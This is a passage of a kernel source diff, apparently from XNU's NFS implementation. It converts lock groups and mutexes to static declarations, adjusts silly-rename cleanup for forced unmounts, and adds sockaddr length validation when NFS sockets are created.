        nhpp = NFSNOHASH(nfshash);
        for (np = nhpp->lh_first; np != 0; np = np->n_hash.le_next) {
                mp2 = (np->n_hflag & NHINIT) ? np->n_mount : NFSTOMP(np);
@@ -256,13 +243,13 @@ loop:
                if ((np->n_hflag & NHINIT) || ((np->n_hflag & NHLOCKED) && !(flags & NG_NOCREATE))) {
                        np->n_hflag |= NHLOCKWANT;
                        FSDBG(263, dnp, np, np->n_flag, 0xcace2222);
-                       msleep(np, nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL);
+                       msleep(np, &nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL);
                        FSDBG(263, dnp, np, np->n_flag, 0xcace3333);
                        goto loop;
                }
                vp = NFSTOV(np);
                vid = vnode_vid(vp);
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                if ((error = vnode_getwithvid(vp, vid))) {
                        /*
                         * If vnode is being reclaimed or has already
@@ -389,7 +376,7 @@ loop:
        FSDBG(263, mp, dnp, npp, 0xaaaaaaaa);
 
        if (flags & NG_NOCREATE) {
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                *npp = 0;
                FSDBG_BOT(263, dnp, *npp, 0x80000001, ENOENT);
                return ENOENT;
@@ -436,7 +423,7 @@ loop:
        if (fhsize > NFS_SMALLFH) {
                MALLOC(np->n_fhp, u_char *, fhsize, M_NFSBIGFH, M_WAITOK);
                if (!np->n_fhp) {
-                       lck_mtx_unlock(nfs_node_hash_mutex);
+                       lck_mtx_unlock(&nfs_node_hash_mutex);
                        NFS_ZFREE(nfsnode_zone, np);
                        *npp = 0;
                        FSDBG_BOT(263, dnp, *npp, 0x80000002, ENOMEM);
@@ -454,13 +441,13 @@ loop:
        FSDBG(266, 0, np, np->n_flag, np->n_hflag);
 
        /* lock the new nfsnode */
-       lck_mtx_init(&np->n_lock, nfs_node_lck_grp, LCK_ATTR_NULL);
-       lck_rw_init(&np->n_datalock, nfs_data_lck_grp, LCK_ATTR_NULL);
-       lck_mtx_init(&np->n_openlock, nfs_open_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&np->n_lock, &nfs_node_lck_grp, LCK_ATTR_NULL);
+       lck_rw_init(&np->n_datalock, &nfs_data_lck_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&np->n_openlock, &nfs_open_grp, LCK_ATTR_NULL);
        lck_mtx_lock(&np->n_lock);
 
        /* release lock on hash table */
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        /* do initial loading of attributes */
        NACLINVALIDATE(np);
@@ -469,14 +456,14 @@ loop:
        if (error) {
                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                nfs_node_unlock(np);
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                LIST_REMOVE(np, n_hash);
                np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED);
                if (np->n_hflag & NHLOCKWANT) {
                        np->n_hflag &= ~NHLOCKWANT;
                        wakeup(np);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                if (np->n_parent) {
                        if (!vnode_get(np->n_parent)) {
                                vnode_rele(np->n_parent);
@@ -484,9 +471,9 @@ loop:
                        }
                        np->n_parent = NULL;
                }
-               lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp);
-               lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp);
-               lck_mtx_destroy(&np->n_openlock, nfs_open_grp);
+               lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp);
+               lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp);
+               lck_mtx_destroy(&np->n_openlock, &nfs_open_grp);
                if (np->n_fhsize > NFS_SMALLFH) {
                        FREE(np->n_fhp, M_NFSBIGFH);
                }
@@ -563,14 +550,14 @@ loop:
        if (error) {
                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                nfs_node_unlock(np);
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                LIST_REMOVE(np, n_hash);
                np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED);
                if (np->n_hflag & NHLOCKWANT) {
                        np->n_hflag &= ~NHLOCKWANT;
                        wakeup(np);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                if (np->n_parent) {
                        if (!vnode_get(np->n_parent)) {
                                vnode_rele(np->n_parent);
@@ -578,9 +565,9 @@ loop:
                        }
                        np->n_parent = NULL;
                }
-               lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp);
-               lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp);
-               lck_mtx_destroy(&np->n_openlock, nfs_open_grp);
+               lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp);
+               lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp);
+               lck_mtx_destroy(&np->n_openlock, &nfs_open_grp);
                if (np->n_fhsize > NFS_SMALLFH) {
                        FREE(np->n_fhp, M_NFSBIGFH);
                }
@@ -594,13 +581,13 @@ loop:
        /* node is now initialized */
 
        /* check if anyone's waiting on this node */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        np->n_hflag &= ~(NHINIT | NHLOCKED);
        if (np->n_hflag & NHLOCKWANT) {
                np->n_hflag &= ~NHLOCKWANT;
                wakeup(np);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        *npp = np;
 
@@ -835,28 +822,37 @@ restart:
                ubc_setsize(vp, 0);
        }
 
-       /* mark this node and the directory busy while we do the remove */
-       busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx));
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* mark this node and the directory busy while we do the remove */
+               busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx));
+       } else {
+               /* forced unmount: we can't trust nsp->nsr_dnp, so mark only this np busy */
+               busyerror = nfs_node_set_busy(np, vfs_context_thread(ctx));
+       }
 
        /* lock the node while we remove the silly file */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        while (np->n_hflag & NHLOCKED) {
                np->n_hflag |= NHLOCKWANT;
-               msleep(np, nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL);
+               msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL);
        }
        np->n_hflag |= NHLOCKED;
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
-       /* purge the name cache to deter others from finding it */
-       bzero(&cn, sizeof(cn));
-       cn.cn_nameptr = nsp->nsr_name;
-       cn.cn_namelen = nsp->nsr_namlen;
-       nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx);
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* purge the name cache to deter others from finding it */
+               bzero(&cn, sizeof(cn));
+               cn.cn_nameptr = nsp->nsr_name;
+               cn.cn_namelen = nsp->nsr_namlen;
+               nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx);
+       }
 
        FSDBG(264, np, np->n_size, np->n_vattr.nva_size, 0xf00d00f1);
 
-       /* now remove the silly file */
-       nfs_removeit(nsp);
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* now remove the silly file */
+               nfs_removeit(nsp);
+       }
 
        /* clear all flags other than these */
        nfs_node_lock_force(np);
@@ -864,7 +860,11 @@ restart:
        nfs_node_unlock(np);
 
        if (!busyerror) {
-               nfs_node_clear_busy2(nsp->nsr_dnp, np);
+               if (!vfs_isforce(nmp->nm_mountp)) {
+                       nfs_node_clear_busy2(nsp->nsr_dnp, np);
+               } else {
+                       nfs_node_clear_busy(np);
+               }
        }
 
        if (unhash && vnode_isinuse(vp, 0)) {
@@ -873,7 +873,7 @@ restart:
                ubc_setsize(vp, np->n_size);
        }
 
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        if (unhash) {
                /*
                 * remove nfsnode from hash now so we can't accidentally find it
@@ -893,13 +893,16 @@ restart:
                np->n_hflag &= ~NHLOCKWANT;
                wakeup(np);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        /* cleanup sillyrename info */
        if (nsp->nsr_cred != NOCRED) {
                kauth_cred_unref(&nsp->nsr_cred);
        }
-       vnode_rele(NFSTOV(nsp->nsr_dnp));
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* in case of forced unmount, usecounts are ignored anyway */
+               vnode_rele(NFSTOV(nsp->nsr_dnp));
+       }
        FREE(nsp, M_TEMP);
        FSDBG_BOT(264, vp, np, np->n_flag, 0);
 out_free:
@@ -1056,14 +1059,14 @@ nfs_vnop_reclaim(
                lck_mtx_unlock(&nmp->nm_lock);
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (!force && (!LIST_EMPTY(&np->n_dirtyblkhd) || !LIST_EMPTY(&np->n_cleanblkhd))) {
                NP(np, "nfs_reclaim: dropping %s buffers", (!LIST_EMPTY(&np->n_dirtyblkhd) ? "dirty" : "clean"));
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        nfs_vinvalbuf(vp, V_IGNORE_WRITEERR, ap->a_context, 0);
 
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
 
        if ((vnode_vtype(vp) != VDIR) && np->n_sillyrename) {
                if (!force) {
@@ -1083,7 +1086,7 @@ nfs_vnop_reclaim(
                np->n_hflag &= ~NHHASHED;
                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        /*
         * Free up any directory cookie structures and large file handle
@@ -1110,9 +1113,9 @@ nfs_vnop_reclaim(
                np->n_parent = NULL;
        }
 
-       lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp);
-       lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp);
-       lck_mtx_destroy(&np->n_openlock, nfs_open_grp);
+       lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp);
+       lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp);
+       lck_mtx_destroy(&np->n_openlock, &nfs_open_grp);
 
        FSDBG_BOT(265, vp, np, np->n_flag, 0xd1ed1e);
        NFS_ZFREE(nfsnode_zone, np);
@@ -1434,7 +1437,7 @@ nfs_mount_is_dirty(mount_t mp)
        u_long ncnt = 0;
        microuptime(&now);
 #endif
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        for (i = 0; i <= nfsnodehash; i++) {
                LIST_FOREACH(np, &nfsnodehashtbl[i], n_hash) {
 #ifdef DODEBUG
@@ -1446,7 +1449,7 @@ nfs_mount_is_dirty(mount_t mp)
                }
        }
 out:
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 #ifdef DODEBUG
        microuptime(&then);
        timersub(&then, &now, &diff);
index 31db576a6ee51329ae8eff7df7337ee5b05e4f27..0346a75028f32f812df4916dede2f5f1953a0b27 100644 (file)
 
 int nfsd_thread_count = 0;
 int nfsd_thread_max = 0;
-lck_grp_t *nfsd_lck_grp;
-lck_mtx_t *nfsd_mutex;
+static LCK_GRP_DECLARE(nfsd_lck_grp, "nfsd");
+LCK_MTX_DECLARE(nfsd_mutex, &nfsd_lck_grp);
 struct nfsd_head nfsd_head, nfsd_queue;
 
-lck_grp_t *nfsrv_slp_rwlock_group;
-lck_grp_t *nfsrv_slp_mutex_group;
+LCK_GRP_DECLARE(nfsrv_slp_rwlock_group, "nfsrv-slp-rwlock");
+LCK_GRP_DECLARE(nfsrv_slp_mutex_group, "nfsrv-slp-mutex");
 struct nfsrv_sockhead nfsrv_socklist, nfsrv_sockwg,
     nfsrv_sockwait, nfsrv_sockwork;
 struct nfsrv_sock *nfsrv_udpsock = NULL;
@@ -132,15 +132,15 @@ struct nfsrv_expfs_list nfsrv_exports;
 struct nfsrv_export_hashhead *nfsrv_export_hashtbl = NULL;
 int nfsrv_export_hash_size = NFSRVEXPHASHSZ;
 u_long nfsrv_export_hash;
-lck_grp_t *nfsrv_export_rwlock_group;
-lck_rw_t nfsrv_export_rwlock;
+static LCK_GRP_DECLARE(nfsrv_export_rwlock_group, "nfsrv-export-rwlock");
+LCK_RW_DECLARE(nfsrv_export_rwlock, &nfsrv_export_rwlock_group);
 
 #if CONFIG_FSE
 /* NFS server file modification event generator */
 struct nfsrv_fmod_hashhead *nfsrv_fmod_hashtbl;
 u_long nfsrv_fmod_hash;
-lck_grp_t *nfsrv_fmod_grp;
-lck_mtx_t *nfsrv_fmod_mutex;
+static LCK_GRP_DECLARE(nfsrv_fmod_grp, "nfsrv_fmod");
+LCK_MTX_DECLARE(nfsrv_fmod_mutex, &nfsrv_fmod_grp);
 static int nfsrv_fmod_timer_on = 0;
 int nfsrv_fsevents_enabled = 1;
 #endif
@@ -158,7 +158,7 @@ uint32_t nfsrv_user_stat_enabled = 1;
 uint32_t nfsrv_user_stat_node_count = 0;
 uint32_t nfsrv_user_stat_max_idle_sec = NFSRV_USER_STAT_DEF_IDLE_SEC;
 uint32_t nfsrv_user_stat_max_nodes = NFSRV_USER_STAT_DEF_MAX_NODES;
-lck_grp_t *nfsrv_active_user_mutex_group;
+LCK_GRP_DECLARE(nfsrv_active_user_mutex_group, "nfs-active-user-mutex");
 
 int nfsrv_wg_delay = NFSRV_WGATHERDELAY * 1000;
 int nfsrv_wg_delay_v3 = 0;
@@ -203,31 +203,12 @@ nfsrv_init(void)
                printf("struct nfsrv_sock bloated (> %dbytes)\n", NFS_SVCALLOC);
        }
 
-       /* init nfsd mutex */
-       nfsd_lck_grp = lck_grp_alloc_init("nfsd", LCK_GRP_ATTR_NULL);
-       nfsd_mutex = lck_mtx_alloc_init(nfsd_lck_grp, LCK_ATTR_NULL);
-
-       /* init slp rwlock */
-       nfsrv_slp_rwlock_group = lck_grp_alloc_init("nfsrv-slp-rwlock", LCK_GRP_ATTR_NULL);
-       nfsrv_slp_mutex_group  = lck_grp_alloc_init("nfsrv-slp-mutex", LCK_GRP_ATTR_NULL);
-
        /* init export data structures */
        LIST_INIT(&nfsrv_exports);
-       nfsrv_export_rwlock_group = lck_grp_alloc_init("nfsrv-export-rwlock", LCK_GRP_ATTR_NULL);
-       lck_rw_init(&nfsrv_export_rwlock, nfsrv_export_rwlock_group, LCK_ATTR_NULL);
-
-       /* init active user list mutex structures */
-       nfsrv_active_user_mutex_group = lck_grp_alloc_init("nfs-active-user-mutex", LCK_GRP_ATTR_NULL);
-
-       /* init nfs server request cache mutex */
-       nfsrv_reqcache_lck_grp = lck_grp_alloc_init("nfsrv_reqcache", LCK_GRP_ATTR_NULL);
-       nfsrv_reqcache_mutex = lck_mtx_alloc_init(nfsrv_reqcache_lck_grp, LCK_ATTR_NULL);
 
 #if CONFIG_FSE
        /* init NFS server file modified event generation */
        nfsrv_fmod_hashtbl = hashinit(NFSRVFMODHASHSZ, M_TEMP, &nfsrv_fmod_hash);
-       nfsrv_fmod_grp = lck_grp_alloc_init("nfsrv_fmod", LCK_GRP_ATTR_NULL);
-       nfsrv_fmod_mutex = lck_mtx_alloc_init(nfsrv_fmod_grp, LCK_ATTR_NULL);
 #endif
 
        /* initialize NFS server timer callouts */
@@ -1146,7 +1127,7 @@ nfsrv_fmod_timer(__unused void *param0, __unused void *param1)
        int i, fmod_fire;
 
        LIST_INIT(&firehead);
-       lck_mtx_lock(nfsrv_fmod_mutex);
+       lck_mtx_lock(&nfsrv_fmod_mutex);
 again:
        clock_get_uptime(&timenow);
        clock_interval_to_deadline(nfsrv_fmod_pendtime, 1000 * 1000,
@@ -1194,7 +1175,7 @@ again:
        }
 
        if (fmod_fire) {
-               lck_mtx_unlock(nfsrv_fmod_mutex);
+               lck_mtx_unlock(&nfsrv_fmod_mutex);
                /*
                 * Fire off the content modified fsevent for each
                 * entry and free it.
@@ -1211,7 +1192,7 @@ again:
                        LIST_REMOVE(fp, fm_link);
                        FREE(fp, M_TEMP);
                }
-               lck_mtx_lock(nfsrv_fmod_mutex);
+               lck_mtx_lock(&nfsrv_fmod_mutex);
                nfsrv_fmod_pending -= fmod_fire;
                goto again;
        }
@@ -1234,7 +1215,7 @@ again:
                nfs_interval_timer_start(nfsrv_fmod_timer_call, interval);
        }
 
-       lck_mtx_unlock(nfsrv_fmod_mutex);
+       lck_mtx_unlock(&nfsrv_fmod_mutex);
 }
 
 /*
@@ -1250,7 +1231,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx)
        struct nfsrv_fmod *fp;
        struct nfsrv_fmod_hashhead *head;
 
-       lck_mtx_lock(nfsrv_fmod_mutex);
+       lck_mtx_lock(&nfsrv_fmod_mutex);
 
        /*
         * Compute the time in the future when the
@@ -1271,7 +1252,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx)
                                LIST_REMOVE(fp, fm_link);
                                LIST_INSERT_HEAD(head, fp, fm_link);
                        }
-                       lck_mtx_unlock(nfsrv_fmod_mutex);
+                       lck_mtx_unlock(&nfsrv_fmod_mutex);
                        return;
                }
        }
@@ -1306,7 +1287,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx)
                    nfsrv_fmod_pendtime);
        }
 done:
-       lck_mtx_unlock(nfsrv_fmod_mutex);
+       lck_mtx_unlock(&nfsrv_fmod_mutex);
        return;
 }
 #endif /* CONFIG_FSE */
@@ -1856,7 +1837,7 @@ loop1:
         *
         * Add/Remove the socket in the nfsrv_sockwg queue as needed.
         */
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        if (slp->ns_wgtime) {
                if (slp->ns_wgq.tqe_next == SLPNOLIST) {
                        TAILQ_INSERT_HEAD(&nfsrv_sockwg, slp, ns_wgq);
@@ -1870,7 +1851,7 @@ loop1:
                TAILQ_REMOVE(&nfsrv_sockwg, slp, ns_wgq);
                slp->ns_wgq.tqe_next = SLPNOLIST;
        }
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        return 0;
 }
@@ -1950,7 +1931,7 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1)
        cur_usec = now.tv_sec * 1000000 + now.tv_usec;
        next_usec = cur_usec + (NFSRV_WGATHERDELAY * 1000);
 
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        TAILQ_FOREACH(slp, &nfsrv_sockwg, ns_wgq) {
                if (slp->ns_wgtime) {
                        writes_pending++;
@@ -1969,10 +1950,10 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1)
 
        if (writes_pending == 0) {
                nfsrv_wg_timer_on = 0;
-               lck_mtx_unlock(nfsd_mutex);
+               lck_mtx_unlock(&nfsd_mutex);
                return;
        }
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        /*
         * Return the number of msec to wait again
index eaca59ada18a6e41c6dd36299f82b1bf785a13a7..435bbb7826a0b41d35348fb883d4c5298aa3b60f 100644 (file)
@@ -90,6 +90,7 @@
 #include <sys/tprintf.h>
 #include <libkern/OSAtomic.h>
 
+#include <sys/reboot.h>
 #include <sys/time.h>
 #include <kern/clock.h>
 #include <kern/task.h>
 #define NFS_SOCK_DBG(...) NFS_DBG(NFS_FAC_SOCK, 7, ## __VA_ARGS__)
 #define NFS_SOCK_DUMP_MBUF(msg, mb) if (NFS_IS_DBG(NFS_FAC_SOCK, 15)) nfs_dump_mbuf(__func__, __LINE__, (msg), (mb))
 
+#ifndef SUN_LEN
+#define SUN_LEN(su) \
+       (sizeof(*(su)) - sizeof((su)->sun_path) + strnlen((su)->sun_path, sizeof((su)->sun_path)))
+#endif /* SUN_LEN */
+
 /* XXX */
 boolean_t       current_thread_aborted(void);
 kern_return_t   thread_terminate(thread_t);
@@ -552,17 +558,27 @@ nfs_socket_create(
 
        switch (sa->sa_family) {
        case AF_INET:
+               if (sa->sa_len != sizeof(struct sockaddr_in)) {
+                       return EINVAL;
+               }
+               sinaddr = &((struct sockaddr_in*)sa)->sin_addr;
+               if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) {
+                       strlcpy(naddr, "<unknown>", sizeof(naddr));
+               }
+               break;
        case AF_INET6:
-               if (sa->sa_family == AF_INET) {
-                       sinaddr = &((struct sockaddr_in*)sa)->sin_addr;
-               } else {
-                       sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr;
+               if (sa->sa_len != sizeof(struct sockaddr_in6)) {
+                       return EINVAL;
                }
+               sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr;
                if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) {
                        strlcpy(naddr, "<unknown>", sizeof(naddr));
                }
                break;
        case AF_LOCAL:
+               if (sa->sa_len != sizeof(struct sockaddr_un) && sa->sa_len != SUN_LEN((struct sockaddr_un *)sa)) {
+                       return EINVAL;
+               }
                strlcpy(naddr, ((struct sockaddr_un *)sa)->sun_path, sizeof(naddr));
                break;
        default:
@@ -586,7 +602,7 @@ nfs_socket_create(
                }
                return ENOMEM;
        }
-       lck_mtx_init(&nso->nso_lock, nfs_request_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&nso->nso_lock, &nfs_request_grp, LCK_ATTR_NULL);
        nso->nso_sotype = sotype;
        if (nso->nso_sotype == SOCK_STREAM) {
                nfs_rpc_record_state_init(&nso->nso_rrs);
@@ -673,7 +689,7 @@ nfs_socket_destroy(struct nfs_socket *nso)
        if (nso->nso_sotype == SOCK_STREAM) {
                nfs_rpc_record_state_cleanup(&nso->nso_rrs);
        }
-       lck_mtx_destroy(&nso->nso_lock, nfs_request_grp);
+       lck_mtx_destroy(&nso->nso_lock, &nfs_request_grp);
        if (nso->nso_saddr) {
                FREE(nso->nso_saddr, M_SONAME);
        }
@@ -1988,7 +2004,7 @@ nfs_reconnect(struct nfsmount *nmp)
         * as needing a resend.  (Though nfs_need_reconnect() probably
         * marked them all already.)
         */
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(rq, &nfs_reqq, r_chain) {
                if (rq->r_nmp == nmp) {
                        lck_mtx_lock(&rq->r_mtx);
@@ -2003,7 +2019,7 @@ nfs_reconnect(struct nfsmount *nmp)
                        lck_mtx_unlock(&rq->r_mtx);
                }
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
        return 0;
 }
 
@@ -2061,7 +2077,7 @@ nfs_need_reconnect(struct nfsmount *nmp)
         * Loop through outstanding request list and
         * mark all requests as needing a resend.
         */
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(rq, &nfs_reqq, r_chain) {
                if (rq->r_nmp == nmp) {
                        lck_mtx_lock(&rq->r_mtx);
@@ -2076,7 +2092,7 @@ nfs_need_reconnect(struct nfsmount *nmp)
                        lck_mtx_unlock(&rq->r_mtx);
                }
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 }
 
 
@@ -2445,7 +2461,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp)
        int error, on = 1;
        in_port_t port;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (nfs4_cb_id == 0) {
                TAILQ_INIT(&nfs4_cb_mounts);
                TAILQ_INIT(&nfs4_cb_socks);
@@ -2459,7 +2475,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp)
        TAILQ_INSERT_HEAD(&nfs4_cb_mounts, nmp, nm_cblink);
 
        if (nfs4_cb_so) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
 
@@ -2575,7 +2591,7 @@ ipv6_bind_again:
 fail:
        if (error) {
                nfs4_cb_so = nfs4_cb_so6 = NULL;
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                if (so) {
                        sock_shutdown(so, SHUT_RDWR);
                        sock_close(so);
@@ -2585,7 +2601,7 @@ fail:
                        sock_close(so6);
                }
        } else {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
        }
 }
 
@@ -2604,19 +2620,19 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp)
        struct nfs4_cb_sock_list cb_socks;
        struct timespec ts = { .tv_sec = 1, .tv_nsec = 0 };
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (nmp->nm_cbid == 0) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        TAILQ_REMOVE(&nfs4_cb_mounts, nmp, nm_cblink);
        /* wait for any callbacks in progress to complete */
        while (nmp->nm_cbrefs) {
-               msleep(&nmp->nm_cbrefs, nfs_global_mutex, PSOCK, "cbshutwait", &ts);
+               msleep(&nmp->nm_cbrefs, &nfs_global_mutex, PSOCK, "cbshutwait", &ts);
        }
        nmp->nm_cbid = 0;
        if (--nfs4_cb_so_usecount) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        so = nfs4_cb_so;
@@ -2624,7 +2640,7 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp)
        nfs4_cb_so = nfs4_cb_so6 = NULL;
        TAILQ_INIT(&cb_socks);
        TAILQ_CONCAT(&cb_socks, &nfs4_cb_socks, ncbs_link);
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
        if (so) {
                sock_shutdown(so, SHUT_RDWR);
                sock_close(so);
@@ -2654,10 +2670,10 @@ nfs4_callback_timer(__unused void *param0, __unused void *param1)
        struct timeval now;
 
 loop:
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (TAILQ_EMPTY(&nfs4_cb_socks)) {
                nfs4_callback_timer_on = 0;
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        microuptime(&now);
@@ -2667,7 +2683,7 @@ loop:
                        continue;
                }
                TAILQ_REMOVE(&nfs4_cb_socks, ncbsp, ncbs_link);
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                sock_shutdown(ncbsp->ncbs_so, SHUT_RDWR);
                sock_close(ncbsp->ncbs_so);
                nfs_rpc_record_state_cleanup(&ncbsp->ncbs_rrs);
@@ -2677,7 +2693,7 @@ loop:
        nfs4_callback_timer_on = 1;
        nfs_interval_timer_start(nfs4_callback_timer_call,
            NFS4_CB_TIMER_PERIOD * 1000);
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 }
 
 /*
@@ -2741,7 +2757,7 @@ nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag)
        microuptime(&now);
        ncbsp->ncbs_stamp = now.tv_sec;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
 
        /* add it to the list */
        TAILQ_INSERT_HEAD(&nfs4_cb_socks, ncbsp, ncbs_link);
@@ -2772,7 +2788,7 @@ nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag)
                nfs_interval_timer_start(nfs4_callback_timer_call, 500);
        }
 
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 }
 
 /*
@@ -2788,14 +2804,14 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag)
        mbuf_t m;
        int error = 0, recv = 1;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        while (ncbsp->ncbs_flags & NCBSOCK_UPCALL) {
                /* wait if upcall is already in progress */
                ncbsp->ncbs_flags |= NCBSOCK_UPCALLWANT;
-               msleep(ncbsp, nfs_global_mutex, PSOCK, "cbupcall", &ts);
+               msleep(ncbsp, &nfs_global_mutex, PSOCK, "cbupcall", &ts);
        }
        ncbsp->ncbs_flags |= NCBSOCK_UPCALL;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        /* loop while we make error-free progress */
        while (!error && recv) {
@@ -2819,9 +2835,9 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag)
                ncbsp->ncbs_stamp = now.tv_sec;
        }
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        ncbsp->ncbs_flags &= ~NCBSOCK_UPCALL;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
        wakeup(ncbsp);
 }
 
@@ -2924,7 +2940,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq)
                        goto nfsmout;
                }
                /* match the callback ID to a registered mount */
-               lck_mtx_lock(nfs_global_mutex);
+               lck_mtx_lock(&nfs_global_mutex);
